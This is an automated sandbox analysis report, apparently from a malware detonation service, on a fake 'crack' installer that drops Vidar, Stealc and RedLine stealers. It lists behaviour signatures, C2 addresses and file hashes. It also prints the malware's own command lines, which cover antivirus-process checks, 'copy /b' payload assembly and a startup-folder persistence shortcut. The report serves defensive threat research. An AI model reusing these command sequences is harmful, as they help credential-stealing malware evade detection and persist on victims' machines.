Analysis Overview
Threat Level: Known bad
The file https://download.tt2dd.com/ was found to be: Known bad.
Malicious Activity Summary
Detect Vidar Stealer
Stealc
Vidar
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine payload
Reads user/profile data of web browsers
Executes dropped EXE
Drops startup file
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Checks installed software on the system
Program crash
Enumerates physical storage devices
Uses Volume Shadow Copy WMI provider
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Enumerates processes with tasklist
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Modifies system certificate store
Suspicious use of SendNotifyMessage
Runs ping.exe
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Uses Volume Shadow Copy service COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-05-09 13:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-05-09 13:02
Reported: 2024-05-09 13:05
Platform: win10-20240404-ja
Max time kernel: 150s
Max time network: 152s
Command Line
Signatures
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4536 created 3284 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\Announcement.pif | C:\Windows\Explorer.EXE |
| PID 4536 created 3284 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\Announcement.pif | C:\Windows\Explorer.EXE |
Vidar
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Crack.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Setup.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1151\Equivalent.pif |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1151\Equivalent.pif |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133597333775792595" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\RegAsm.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://download.tt2dd.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffad1ec9758,0x7ffad1ec9768,0x7ffad1ec9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1852 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2184 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4792 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4708 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\" -spe -an -ai#7zMap24869:146:7zEvent13736
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\" -spe -an -ai#7zMap2856:228:7zEvent6800
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Crack.exe
"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Crack.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Broken Broken.cmd & Broken.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 1151
C:\Windows\SysWOW64\findstr.exe
findstr /V "BluesAlgeriaDefinedIntersection" Pressed
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Breakfast + Dinner + Steven 1151\Q
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1151\Equivalent.pif
1151\Equivalent.pif 1151\Q
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Setup.exe
"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Reprint Reprint.cmd & Reprint.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 55205415
C:\Windows\SysWOW64\findstr.exe
findstr /V "pastinvitationinformalimproving" Does
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Bikini + Relief + Fw + Maximize + Bases 55205415\q
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\Announcement.pif
55205415\Announcement.pif 55205415\q
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\LynxChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url" & exit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\RegAsm.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\RegAsm.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 2364
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 2356
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | download.tt2dd.com | udp |
| US | 108.178.44.242:443 | download.tt2dd.com | tcp |
| US | 108.178.44.242:443 | download.tt2dd.com | tcp |
| US | 108.178.44.242:443 | download.tt2dd.com | udp |
| US | 8.8.8.8:53 | 242.44.178.108.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | dhiqaragency.com | udp |
| US | 172.67.215.245:443 | dhiqaragency.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 245.215.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | BDMkHBPzrNwUIRfHIVtQKUDid.BDMkHBPzrNwUIRfHIVtQKUDid | udp |
| US | 8.8.8.8:53 | KUZLiTEaapNEWFMhPiGnHQGgq.KUZLiTEaapNEWFMhPiGnHQGgq | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| US | 8.8.8.8:53 | 92.92.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.242.109.65.in-addr.arpa | udp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.14.97.104.in-addr.arpa | udp |
| UA | 45.89.53.206:4663 | N/A | tcp |
| US | 8.8.8.8:53 | 206.53.89.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
\??\pipe\crashpad_200_PDFQZEAWMMWOXPDR
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\4ae54ba8-a068-4e20-a966-2382f3891bb1.tmp
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar.gz.crdownload
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\bin\Debug\MusicPlayerApp.vshost.exe.config
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Broken
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Pressed
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Pension
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Crazy
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Seasons
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Password
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Storage
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Answering
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Ta
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Joins
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Exercises
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Vibrator
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Valid
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Vast
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Blocked
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Appliance
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Sunshine
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Consumer
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Judy
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Sexual
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Latino
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Reforms
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Nike
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Informal
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Payable
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Coordinate
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Request
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Dan
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Tmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Accuracy
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Responded
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Breakfast
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Dinner
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Steven
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1151\Equivalent.pif
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1151\Q
| SHA1 | ccaf0c65ec9bd008744ffe40568ce51e6bae713d |
| SHA256 | 3b7825dc157b085a7b3716112ff054b6551dd0509344197b94a3627d9f156765 |
| SHA512 | 93e97ec04af55a8652955680096c6e48883040a668ac23c9db450187accdc09b3ea01475e4108d4b6761657ec9728bc05235262c083f004dc864f1090a252188 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Reprint
| MD5 | 55dd4a20f7eeebd633cd9686d55a6fb2 |
| SHA1 | 400dcd289e265494671d162731aea59eacceab0d |
| SHA256 | dff5d673567b73e1bb4ecc210d61d1db5a5653920cb2aba84d1cef5d6d3ebabe |
| SHA512 | 59748f5fd92a00d3234c06ce3335cd9b387a48449b454aef915ab539d13de2c5983892c9d88fd713327b2fa67e5ec2b1f2e2417a52fb38f4c4b56f079d8a6d16 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Does
| MD5 | 77e157cb17ed60656abee35ef0346168 |
| SHA1 | 1c3d0dfcbc3be543b798b74cd92958128ca8b128 |
| SHA256 | e257d8d93bf73e5e4a8c40fbdceb6e13e9651f683f18782d6cea323402a07548 |
| SHA512 | 3e970d2773b117c02b3640935704f2e3ec62cc7dc5d12364efe80249c1ca7c8231f4d6b245f1c744f4fa69441fd2e40681e0f9dd886d3f4f245624cad3db3082 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\His
| MD5 | 751c49aad91b18494d138ee0cc6cb622 |
| SHA1 | 621725721b84a279817f3bc0bcc9b325218548ce |
| SHA256 | 3bdeea17d6e666560aee48eb09fadc35c8715540b6ac68e5800018100ecab0cc |
| SHA512 | 3570f90da5ef4386f57233aeb6caa1f8e71dc9a3caa92b05bb56a768d7569a2d074bfbb3e89d975f8cceb458013538aa331da6870ea006a148405346e8b06c76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Proposition
| MD5 | 1702b70ee4cbb05665de2037f0f88161 |
| SHA1 | 8be05a314d814265b8da7ee8a934624753fbd38d |
| SHA256 | 6492974c3ce14d4813b4cf2da843329a435648a339b95dfd32f8d566626a5f99 |
| SHA512 | 5a0b7cbdde942a176fb9f9ba238a4e15c2d6da1cf0e7eb3742c69727faf447d21d62eaeee2bcc9b2b7b92b9a8cf4c48f47ce28f16a6c3613a95114deb0083f2d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Spears
| MD5 | 8545d958ef99bfb24b569ab066d8e27d |
| SHA1 | 303b7b887280b61cae2936201cebb874c16f9b3b |
| SHA256 | e67d227e4dfc69ff61d03c5ece2ce16458f8ae590a133976397129bf9ee56406 |
| SHA512 | b2c357bd47f6a470b12e1ae518706814166f053f242c73abbdc230cfa07a56baf7917e63adb1563161583adb89a2f2a7d7ed7d7d22ab3324674a3c7b0bb94ee6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Laden
| MD5 | 900fe58c36324ceac6581212821ad122 |
| SHA1 | 3e8ff27af8047e98151368d414eafebeffb88e28 |
| SHA256 | 71caf18a2e40d456dd84d694a55d92e417342c524de6239157236efc6b9b32bc |
| SHA512 | e3db08c30c33438b9b6052c10f7d93b1b301a71bc0d8be7a2f95c518056cb129bc6ca4cff12876f5587bddb745abcc3d45d929eef1dcf157487fdd1b6302dcf0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Evolution
| MD5 | 0901b0d0d512bc902feb25490157ffbf |
| SHA1 | b84050cb0496f45b7676ca8237ffd1c1de6d68df |
| SHA256 | 7c2053611fa9cd19b733cb2594caaa1acc1c0d5e9356c6fce5b158c377090ac0 |
| SHA512 | 2b3876ef3b8fff839c10a9119b62b187faea4d4a384815e70e88a29990d9bb8079957bad74e66bc93172c3a8584c652202788e3ac5b7c0309df8ebd8d7465186 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Visit
| MD5 | f8116f63158d44b8a32653ba47d338be |
| SHA1 | 4ce47792d29f7b2d59f2aed06ed530da7ec7db46 |
| SHA256 | 9db8cebd14a1aab1c4dcece95213d4e91941b173e515c079f9913e8323f9520a |
| SHA512 | df97dd0a2e574503fd0593bccec021d460f22dda3c8b9d78ffcc3db7e447d9ea79206dfde6db13038803efa5cf6c5f80124a79b77232e273e96d1a0264b2d646 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Total
| MD5 | af32b2e863ee66a1b6dd74ca65861a05 |
| SHA1 | f1c1c69841d4f47daee1e7f7e1378c5782ce90a4 |
| SHA256 | 64a77c215107ea2183e66cc34352c7d0afdec70e6d794877592c1db7bfcb9264 |
| SHA512 | bf64cc545d5daf167b9af8506e631683e765f809d43c6799e57db60065d1169c991ec83a8b0876ed9582ba3090441403ecba34a1e4c7706cfe06e7203d97fa15 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Corporation
| MD5 | 95d99506ebd81f275db7405c10105217 |
| SHA1 | 770d862a3b2b6c4cdd0dbad515c1b1837e73a85e |
| SHA256 | a39564a2ad5fc274b639108b898d21382c168ef4f4bb16d1a1783550bb3e51c2 |
| SHA512 | 86b3f0faf4aa7265da039d3ff01fb03f47137272a8ad1c17bf0b5496a9d0e4b812108b164a938bdde4f031e1a1140bfdd8ee4a6c2b1bfa7f27f76191934c7367 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Proper
| MD5 | c037de0212cd77bb2acb71b45e2bb7d4 |
| SHA1 | c27d9fd633e3b7ca1de016e804b9f49d485d2e02 |
| SHA256 | 3e767c7ae42fa1a838709ffc869d72558b381f8a359eb8f2dcc7e9ad43abae20 |
| SHA512 | cbe7ae3587c49af096ee7e0188ae94285a27109343940e78fa78e49a75dfe51be5683708b568fb24a39bba6b296f59f03df23c3b7fefb501c611ce96a8111fdf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Bd
| MD5 | ab82d61f75d101eb20cf0a19b79d722d |
| SHA1 | cd32f6392116f7f3ffd211fcdbdb155e0a0bc301 |
| SHA256 | 6292db893218d11fce76dcd5f14b73addd6f6fd19d17661fffe351d55c31145d |
| SHA512 | b166f9bbb0ed16f1c39218dd9cd29b0978568450d7592e4fbc5f3d73acee59772c8f8a713f381148dd9c05a31002641f2976892d55bcb6acc0c77dcc3af35402 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Submission
| MD5 | 00a438783b8ab51d81596ac52ad07157 |
| SHA1 | 55a56232dafe2610d381f536eb942009d5972233 |
| SHA256 | dba238af26bbf85836d27c52ada3106b865ce90b6a17a37247a12ce38c5559e1 |
| SHA512 | 5e0854668487d9eefd3ed36afeb96fbeb78a4a15689d41b29a5a6048df81aba1a9e5e3a22b4cef6f68750be747aa8a84c15c277a1edd6090118d5c99c49faf5f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Turkey
| MD5 | 5d869b16db71ff094e1b063bf014edcb |
| SHA1 | b9003c1ea2eaa6e8443b2a5cd4df570369cf39f6 |
| SHA256 | aa50cd9ab888451202b74afb1b533dfa884b0d3d5184f757f43310d6e2a4dd3c |
| SHA512 | 7508a27b0b7a6e22cbb9d66529b8d66b8054e2db77a4dfea4d7420b69f970281b1a46c6d08c2b1a2e973613046aed7ae6a17610e34f8c4330485c6a325c84b40 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | bd4982658a54e540dcd2517ff7989798 |
| SHA1 | 42a9c4ea17bad9908f376d0ee2385ad9895a9cec |
| SHA256 | a148dd1074cf8a7b60e40a433cf2018b862db6eade0d81001411cffc85880530 |
| SHA512 | f46b3f6a475444534dd75ba9c5b9ac62001fa04bb4c8fc9ae7efb6a3e836db5fa90ea3a0eede52723d53fbb4f733ca5097f8dd19561fd1a62e96f264c70f0c75 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c546a5512148999d4ec2e3fb5c8738d3 |
| SHA1 | ff8572543a517992355d94f64abe4436a57fdd97 |
| SHA256 | fecc189d8870a5e4d223a7a2eb41219f60c87539efec63d3daa396eebf8978a1 |
| SHA512 | 4518778477400def80cefde3cb62819de36c9cf4c3f7bfcbf643ec7eab8d0e5dcaf11fa0f3654a2cc7f954286465c2a185f3e5702e2f2d37c4e29613f09ae850 |
memory/3700-286-0x0000000004650000-0x0000000004897000-memory.dmp
memory/3700-284-0x0000000004650000-0x0000000004897000-memory.dmp
memory/3700-285-0x0000000004650000-0x0000000004897000-memory.dmp
memory/3700-288-0x0000000004650000-0x0000000004897000-memory.dmp
memory/3700-287-0x0000000004650000-0x0000000004897000-memory.dmp
memory/3840-294-0x0000000001360000-0x00000000013B2000-memory.dmp
memory/3840-295-0x0000000005D30000-0x000000000622E000-memory.dmp
memory/3840-296-0x00000000058D0000-0x0000000005962000-memory.dmp
memory/3840-297-0x0000000005870000-0x000000000587A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpC109.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
memory/3840-314-0x00000000064F0000-0x0000000006566000-memory.dmp
memory/3840-315-0x0000000006B10000-0x0000000006B2E000-memory.dmp
memory/3840-317-0x0000000007240000-0x0000000007846000-memory.dmp
memory/3840-318-0x0000000006DB0000-0x0000000006EBA000-memory.dmp
memory/3840-319-0x0000000006CE0000-0x0000000006CF2000-memory.dmp
memory/3840-320-0x0000000006D40000-0x0000000006D7E000-memory.dmp
memory/3840-321-0x0000000006EC0000-0x0000000006F0B000-memory.dmp
memory/3840-322-0x0000000006FA0000-0x0000000006FC4000-memory.dmp
memory/3840-325-0x00000000070E0000-0x00000000071EE000-memory.dmp
memory/3840-326-0x0000000007040000-0x00000000070A6000-memory.dmp
memory/3840-327-0x0000000007AA0000-0x0000000007AF0000-memory.dmp
memory/3840-328-0x0000000008290000-0x0000000008452000-memory.dmp
memory/3840-329-0x0000000008EA0000-0x00000000093CC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-09 13:02
Reported
2024-05-09 13:07
Platform
win7-20240508-ja
